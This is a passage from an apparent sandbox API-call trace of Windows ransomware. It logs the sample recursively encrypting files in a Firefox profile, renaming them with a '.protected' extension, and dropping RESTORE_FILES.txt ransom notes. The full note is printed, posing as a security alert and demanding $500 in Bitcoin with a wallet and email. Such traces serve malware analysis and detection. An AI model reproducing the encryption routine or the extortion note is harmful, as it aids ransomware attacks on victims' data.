(lpString1="..", lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.625] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.625] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.625] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.625] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\..") returned 104 [0090.625] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.625] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.625] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Program Files") returned -1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Program Files (x86)") returned -1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="$Recycle.bin") returned 1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="System Volume Information") returned -1 [0090.625] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 121 [0090.625] lstrcmpW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0090.625] lstrcmpW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0090.625] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*") returned 123 [0090.625] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0090.625] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.626] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.626] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.626] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.626] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.") returned 123 [0090.626] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.626] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0090.626] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.626] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.626] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.626] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.626] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.626] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\..") returned 124 [0090.626] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.626] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.626] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="Windows") returned -1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="Program Files") returned -1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="Program Files (x86)") returned -1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="$Recycle.bin") returned 1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="System Volume Information") returned -1 [0090.626] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.626] StrStrIW (lpFirst=".metadata", lpSrch=".protected") returned 0x0 [0090.626] lstrcmpW (lpString1=".metadata", lpString2="RESTORE_FILES.txt") returned -1 [0090.626] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0090.626] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0090.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.628] StrStrW (lpFirst=".metadata", lpSrch=".txt") returned 0x0 [0090.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.628] StrStrW (lpFirst=".metadata", lpSrch=".rar") returned 0x0 [0090.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.628] StrStrW (lpFirst=".metadata", lpSrch=".zip") returned 0x0 [0090.628] ReadFile (in: hFile=0x15c, lpBuffer=0xce0048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0090.628] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.628] WriteFile (in: hFile=0x15c, lpBuffer=0xce0048*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0090.628] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.629] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0090.629] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0090.629] CloseHandle (hObject=0x15c) returned 1 [0090.630] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.protected") returned 141 [0090.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata.protected")) returned 1 [0090.630] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="Windows") returned -1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="Program Files") returned -1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="Program Files (x86)") returned -1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="$Recycle.bin") returned 1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="System Volume Information") returned -1 [0090.631] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 125 [0090.631] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0090.631] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0090.631] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*") returned 127 [0090.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0090.632] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.632] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.632] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.632] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.632] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.632] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\.") returned 127 [0090.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.632] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0090.632] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.633] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.633] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.633] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.633] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.633] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\..") returned 128 [0090.633] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.633] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.633] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="Windows") returned -1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="Program Files") returned -1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="Program Files (x86)") returned -1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="$Recycle.bin") returned 1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="System Volume Information") returned -1 [0090.633] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 144 [0090.633] lstrcmpW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0090.633] lstrcmpW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0090.633] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*") returned 146 [0090.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0090.634] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.634] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.634] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.634] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.634] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.634] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\.") returned 146 [0090.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.634] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0090.634] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.634] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.634] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.634] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.634] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.634] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\..") returned 147 [0090.634] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.634] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0090.634] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0090.634] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\RESTORE_FILES.txt") returned 162 [0090.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0090.635] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.635] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0090.636] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.636] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0090.636] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.636] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0090.636] CloseHandle (hObject=0x160) returned 1 [0090.636] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Windows") returned -1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Program Files") returned -1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Program Files (x86)") returned -1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="$Recycle.bin") returned 1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="System Volume Information") returned -1 [0090.637] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.637] StrStrIW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".protected") returned 0x0 [0090.637] lstrcmpW (lpString1="818200132aebmoouht.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.637] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0090.637] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0090.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0090.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.638] StrStrW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".txt") returned 0x0 [0090.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.638] StrStrW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".rar") returned 0x0 [0090.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.638] StrStrW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".zip") returned 0x0 [0090.638] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0090.650] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.650] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0090.651] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.651] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0090.652] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0090.652] CloseHandle (hObject=0x160) returned 1 [0090.652] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.protected") returned 161 [0090.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.protected")) returned 1 [0090.653] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0090.653] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0090.653] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\RESTORE_FILES.txt") returned 143 [0090.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.654] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and 